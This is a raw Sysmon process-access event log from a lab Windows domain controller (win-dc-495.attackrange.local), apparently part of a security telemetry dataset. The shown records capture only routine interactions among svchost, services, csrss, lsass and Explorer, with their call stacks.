13:58:19.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.508{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.508{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.305{59A5CD1D-8E44-6005-0A00-00000000A301}8485104C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.305{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.305{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
